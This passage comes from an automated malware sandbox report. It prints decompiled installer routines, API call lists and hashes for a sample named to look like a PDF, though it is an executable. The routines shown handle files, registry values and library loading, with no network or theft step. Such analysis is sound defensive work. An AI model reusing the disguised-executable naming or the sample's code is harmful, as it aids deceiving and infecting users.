                                                                      • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004023AD
                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 004023B6
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.167508240401.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.167508184127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508327237.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508702241.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.jbxd
                                                                      Similarity
                                                                      • API ID: CloseDeleteOpenValue
                                                                      • String ID:
                                                                      • API String ID: 849931509-0
                                                                      • Opcode ID: 36fadadd784cfdd352757bfc407890a7625b957ee28d1f5c4d4051b0d7a27d0b
                                                                      • Instruction ID: c0d23e370c25ffca0c370365ac79ff448217ed3cb42859f8984a45efd79f81dd
                                                                      • Opcode Fuzzy Hash: 36fadadd784cfdd352757bfc407890a7625b957ee28d1f5c4d4051b0d7a27d0b
                                                                      • Instruction Fuzzy Hash: A8F0C233A04111ABEB10BBB49B8EAAE72699F40348F11447FF602B71C0C9FC4D428669
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00401E43 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ShowWindow.USER32(00000000,00000000), ref: 00401E61
                                                                      • EnableWindow.USER32(00000000,00000000), ref: 00401E6C
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.167508240401.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.167508184127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508327237.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508702241.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.jbxd
                                                                      Similarity
                                                                      • API ID: Window$EnableShow
                                                                      • String ID:
                                                                      • API String ID: 1136574915-0
                                                                      • Opcode ID: f8ba6be7df43a4251dec2c44bfddbc0390f0e9115f87f69fb7f1f30a675add9d
                                                                      • Instruction ID: 50398dcd8f08d813da2dc86a20fdec6a2780ea60cea6e306d4739c988c0027c9
                                                                      • Opcode Fuzzy Hash: f8ba6be7df43a4251dec2c44bfddbc0390f0e9115f87f69fb7f1f30a675add9d
                                                                      • Instruction Fuzzy Hash: 15E0D832A08204CFD724DBF4AE8446E73B0EB40318721457FE402F11D0CBF848419B6D
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004065EC Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			E004065EC(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x40a410);
				_t5 = GetModuleHandleA( *(_t10 + 0x40a410));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40a414));
				}
				_t5 = E0040657C(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}





                                                                      0x004065f4
                                                                      0x004065f7
                                                                      0x004065fe
                                                                      0x00406606
                                                                      0x00406612
                                                                      0x00000000
                                                                      0x00406619
                                                                      0x00406609
                                                                      0x00406610
                                                                      0x00000000
                                                                      0x00406621
                                                                      0x00000000

                                                                      APIs
                                                                      • GetModuleHandleA.KERNEL32(?,00000020,?,004034B3,00000009), ref: 004065FE
                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00406619
                                                                        • Part of subcall function 0040657C: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406593
                                                                        • Part of subcall function 0040657C: wsprintfW.USER32 ref: 004065CE
                                                                        • Part of subcall function 0040657C: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 004065E2
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.167508240401.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.167508184127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508327237.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508702241.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.jbxd
                                                                      Similarity
                                                                      • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                      • String ID:
                                                                      • API String ID: 2547128583-0
                                                                      • Opcode ID: 31197a09b32f9822319ed056a1c078f96e3f7aaf520cdba8edd4f010bc886546
                                                                      • Instruction ID: aacf951b1eba8b902ff867273acd7254ef5911eae3d9513ed99e50af610fe84a
                                                                      • Opcode Fuzzy Hash: 31197a09b32f9822319ed056a1c078f96e3f7aaf520cdba8edd4f010bc886546
                                                                      • Instruction Fuzzy Hash: 44E026326046206BC31047705E0893762AC9FC83003020C3EF502F2044CB789C329EAD
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00405DE7 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 68%
                                                                      			E00405DE7(WCHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesW(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileW(_a4, _a8, "true", 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}





                                                                      0x00405deb
                                                                      0x00405df8
                                                                      0x00405e0d
                                                                      0x00405e13

                                                                      APIs
                                                                      • GetFileAttributesW.KERNELBASE(00000003,00402F18,C:\Users\user\Desktop\DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exe,80000000,00000003), ref: 00405DEB
                                                                      • CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405E0D
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.167508240401.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.167508184127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508327237.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508702241.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.jbxd
                                                                      Similarity
                                                                      • API ID: File$AttributesCreate
                                                                      • String ID:
                                                                      • API String ID: 415043291-0
                                                                      • Opcode ID: 7f22f31ca84e25cf3c35cca7fc28e1469c604482c982d9b12555b4894eb7b1e0
                                                                      • Instruction ID: e98dd403a5e5432679a9d4e257ef455d3d6759c2e5ed6cf280caa05d5291d686
                                                                      • Opcode Fuzzy Hash: 7f22f31ca84e25cf3c35cca7fc28e1469c604482c982d9b12555b4894eb7b1e0
                                                                      • Instruction Fuzzy Hash: B3D09E71654601EFEF098F20DF16F2E7AA2EB84B00F11562CB682940E0DA7158199B19
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00405DC2 Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			E00405DC2(WCHAR* _a4) {
				signed char _t3;
				signed char _t7;

				_t3 = GetFileAttributesW(_a4); // executed
				_t7 = _t3;
				if(_t7 != 0xffffffff) {
					SetFileAttributesW(_a4, _t3 & 0x000000fe);
				}
				return _t7;
			}





                                                                      0x00405dc7
                                                                      0x00405dcd
                                                                      0x00405dd2
                                                                      0x00405ddb
                                                                      0x00405ddb
                                                                      0x00405de4

                                                                      APIs
                                                                      • GetFileAttributesW.KERNELBASE(?,?,004059C7,?,?,00000000,00405B9D,?,?,?,?), ref: 00405DC7
                                                                      • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405DDB
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.167508240401.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.167508184127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508327237.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508702241.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.jbxd
                                                                      Similarity
                                                                      • API ID: AttributesFile
                                                                      • String ID:
                                                                      • API String ID: 3188754299-0
                                                                      • Opcode ID: 2eea293136030474feb3e1a7c5b1a6ed000805180dcccd9d627e45cfe66d6639
                                                                      • Instruction ID: 952e92710cc69b9b43d0c132b1ebcdc485dc7d738455aa6d22c0503b32111fdc
                                                                      • Opcode Fuzzy Hash: 2eea293136030474feb3e1a7c5b1a6ed000805180dcccd9d627e45cfe66d6639
                                                                      • Instruction Fuzzy Hash: 9DD0C972504520ABC2112728AE0C89BBB55EB542717028B35FAA9A22B0CB304C568A98
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004058BD Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			E004058BD(WCHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryW(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}




                                                                      0x004058c3
                                                                      0x004058cb
                                                                      0x00000000
                                                                      0x004058d1
                                                                      0x00000000

                                                                      APIs
                                                                      • CreateDirectoryW.KERNELBASE(?,00000000,0040343D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403672), ref: 004058C3
                                                                      • GetLastError.KERNEL32 ref: 004058D1
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.167508240401.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.167508184127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508327237.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508702241.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.jbxd
                                                                      Similarity
                                                                      • API ID: CreateDirectoryErrorLast
                                                                      • String ID:
                                                                      • API String ID: 1375471231-0
                                                                      • Opcode ID: 90cc4c9737d43430731b600de694bcf2d45feac9894761d90dfe22e9228b7257
                                                                      • Instruction ID: 9103f4137618f2f7179a3cd735c3beaeb677db9e9f97e60de6da32ac40298118
                                                                      • Opcode Fuzzy Hash: 90cc4c9737d43430731b600de694bcf2d45feac9894761d90dfe22e9228b7257
                                                                      • Instruction Fuzzy Hash: 42C04C31204A019BD6506B209F08B177A94EF50742F21C4396646F00A0DA348425DF3D
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0040167B Relevance: 1.5, APIs: 1, Instructions: 38fileCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 70%
                                                                      			E0040167B() {
				int _t7;
				void* _t13;
				void* _t15;
				void* _t20;

				_t18 = E00402C53(0xffffffd0);
				_t16 = E00402C53(0xffffffdf);
				E00402C53(0x13);
				_t7 = MoveFileW(_t4, _t5); // executed
				if(_t7 == 0) {
					if( *((intOrPtr*)(_t20 - 0x20)) == _t13 || E00406555(_t18) == 0) {
						 *((intOrPtr*)(_t20 - 4)) = 1;
					} else {
						E004060B3(_t15, _t18, _t16);
						_push(0xffffffe4);
						goto L5;
					}
				} else {
					_push(0xffffffe3);
					L5:
					E00401423();
				}
				 *0x42a2c8 =  *0x42a2c8 +  *((intOrPtr*)(_t20 - 4));
				return 0;
			}







                                                                      0x00401684
                                                                      0x0040168d
                                                                      0x0040168f
                                                                      0x00401696
                                                                      0x0040169e
                                                                      0x004016aa
                                                                      0x004028a1
                                                                      0x004016be
                                                                      0x004016c0
                                                                      0x004016c5
                                                                      0x00000000
                                                                      0x004016c5
                                                                      0x004016a0
                                                                      0x004016a0
                                                                      0x0040224b
                                                                      0x0040224b
                                                                      0x0040224b
                                                                      0x00402ade
                                                                      0x00402aea

                                                                      APIs
                                                                      • MoveFileW.KERNEL32(00000000,00000000), ref: 00401696
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.167508240401.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.167508184127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508327237.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508702241.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.jbxd
                                                                      Similarity
                                                                      • API ID: FileMove
                                                                      • String ID:
                                                                      • API String ID: 3562171763-0
                                                                      • Opcode ID: eef45f6f7cbb4ae7610787b1903b9f2e4969071261f2b43c9ac2ceaff5060594
                                                                      • Instruction ID: 60e635295c4898b6971f0d6b86fcc4365428ea47b068a52fddb524a00f4394d8
                                                                      • Opcode Fuzzy Hash: eef45f6f7cbb4ae7610787b1903b9f2e4969071261f2b43c9ac2ceaff5060594
                                                                      • Instruction Fuzzy Hash: 76F0BB31608524A7DB10B7B59F4DD9E2154AF4236CB21837FF512B21D0DABDC542457F
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00402805 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 33%
                                                                      			E00402805(intOrPtr __edx, void* __eflags) {
				long _t8;
				long _t10;
				LONG* _t12;
				void* _t14;
				intOrPtr _t15;
				void* _t17;
				void* _t19;

				_t15 = __edx;
				_push(ds);
				if(__eflags != 0) {
					_t8 = E00402C31(2);
					_pop(_t14);
					 *((intOrPtr*)(_t19 - 0x50)) = _t15;
					_t10 = SetFilePointer(E00406172(_t14, _t17), _t8, _t12,  *(_t19 - 0x1c)); // executed
					if( *((intOrPtr*)(_t19 - 0x24)) >= _t12) {
						_push(_t10);
						_push( *((intOrPtr*)(_t19 - 0xc)));
						E00406159();
					}
				}
				 *0x42a2c8 =  *0x42a2c8 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}










                                                                      0x00402805
                                                                      0x00402805
                                                                      0x00402806
                                                                      0x0040280e
                                                                      0x00402813
                                                                      0x00402814
                                                                      0x00402823
                                                                      0x0040282c
                                                                      0x00402a7d
                                                                      0x00402a7e
                                                                      0x00402a81
                                                                      0x00402a81
                                                                      0x0040282c
                                                                      0x00402ade
                                                                      0x00402aea

                                                                      APIs
                                                                      • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 00402823
                                                                        • Part of subcall function 00406159: wsprintfW.USER32 ref: 00406166
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.167508240401.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.167508184127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508327237.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508702241.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.jbxd
                                                                      Similarity
                                                                      • API ID: FilePointerwsprintf
                                                                      • String ID:
                                                                      • API String ID: 327478801-0
                                                                      • Opcode ID: 5f1d525169d9ce6b4f9467462e39e8872e382c374fce7961deb580ad00958b0a
                                                                      • Instruction ID: 360c63f9489f710495f37cc3b83494bffb267c36335a31cc71ff2527b59642b3
                                                                      • Opcode Fuzzy Hash: 5f1d525169d9ce6b4f9467462e39e8872e382c374fce7961deb580ad00958b0a
                                                                      • Instruction Fuzzy Hash: 18E06571A00104EBD711DBA4AE45CAE7379DF00308711883BF102B40D1CAB94D529A2D
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0040230C Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			E0040230C(int __eax, WCHAR* __ebx) {
				WCHAR* _t11;
				WCHAR* _t13;
				void* _t17;
				int _t21;

				_t11 = __ebx;
				_t5 = __eax;
				_t13 = 0;
				if(__eax != __ebx) {
					__eax = E00402C53(__ebx);
				}
				if( *((intOrPtr*)(_t17 - 0x24)) != _t11) {
					_t13 = E00402C53(0x11);
				}
				if( *((intOrPtr*)(_t17 - 0x18)) != _t11) {
					_t11 = E00402C53(0x22);
				}
				_t5 = WritePrivateProfileStringW(0, _t13, _t11, E00402C53(0xffffffcd)); // executed
				_t21 = _t5;
				if(_t21 == 0) {
					 *((intOrPtr*)(_t17 - 4)) = 1;
				}
				 *0x42a2c8 =  *0x42a2c8 +  *((intOrPtr*)(_t17 - 4));
				return 0;
			}







                                                                      0x0040230c
                                                                      0x0040230c
                                                                      0x0040230e
                                                                      0x00402312
                                                                      0x00402315
                                                                      0x0040231a
                                                                      0x0040231f
                                                                      0x00402328
                                                                      0x00402328
                                                                      0x0040232d
                                                                      0x00402336
                                                                      0x00402336
                                                                      0x00402343
                                                                      0x004015b4
                                                                      0x004015b6
                                                                      0x004028a1
                                                                      0x004028a1
                                                                      0x00402ade
                                                                      0x00402aea

                                                                      APIs
                                                                      • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 00402343
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.167508240401.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.167508184127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508327237.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508702241.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.jbxd
                                                                      Similarity
                                                                      • API ID: PrivateProfileStringWrite
                                                                      • String ID:
                                                                      • API String ID: 390214022-0
                                                                      • Opcode ID: 196762a6526ae89b3abf44263c4053b82e560c8490a900e61fc9f6afa6b6512d
                                                                      • Instruction ID: 442d6135041436e14d88d5d309934ead45877352a2168de0e76fd2d1165917bb
                                                                      • Opcode Fuzzy Hash: 196762a6526ae89b3abf44263c4053b82e560c8490a900e61fc9f6afa6b6512d
                                                                      • Instruction Fuzzy Hash: 3FE086319085B66BE71036F10F8DABF10589B44385B14057FB612B71C3D9FC4D8242AD
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00401735 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			E00401735() {
				long _t5;
				WCHAR* _t8;
				WCHAR* _t12;
				void* _t14;
				long _t17;

				_t5 = SearchPathW(_t8, E00402C53(0xffffffff), _t8, 0x400, _t12, _t14 + 8); // executed
				_t17 = _t5;
				if(_t17 == 0) {
					 *((intOrPtr*)(_t14 - 4)) = 1;
					 *_t12 = _t8;
				}
				 *0x42a2c8 =  *0x42a2c8 +  *((intOrPtr*)(_t14 - 4));
				return 0;
			}








                                                                      0x00401749
                                                                      0x0040174f
                                                                      0x00401751
                                                                      0x0040286f
                                                                      0x00402876
                                                                      0x00402876
                                                                      0x00402ade
                                                                      0x00402aea

                                                                      APIs
                                                                      • SearchPathW.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 00401749
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.167508240401.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.167508184127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508327237.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508702241.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.jbxd
                                                                      Similarity
                                                                      • API ID: PathSearch
                                                                      • String ID:
                                                                      • API String ID: 2203818243-0
                                                                      • Opcode ID: 6c3edc35958ed4805afce2580c1a768f296b082ad8b251cedd4419103bcb8c87
                                                                      • Instruction ID: d8de68dbe72b960966570827fcf7b95eaea009d5ef273339483d93543a2671c7
                                                                      • Opcode Fuzzy Hash: 6c3edc35958ed4805afce2580c1a768f296b082ad8b251cedd4419103bcb8c87
                                                                      • Instruction Fuzzy Hash: 9BE0D872300100ABD710DB64DE48AAA3398DF0036CF20853AE602A60C0D6B48A41873D
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00402D5D Relevance: 1.5, APIs: 1, Instructions: 22registryCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 79%
                                                                      			E00402D5D(void* __eflags, void* _a4) {
				short* _t8;
				intOrPtr _t9;
				signed int _t11;

				_t8 = E00402C53(0x22);
				_t9 =  *0x40cdd8; // 0x3c7fc48
				_t3 = _t9 + 4; // 0x444
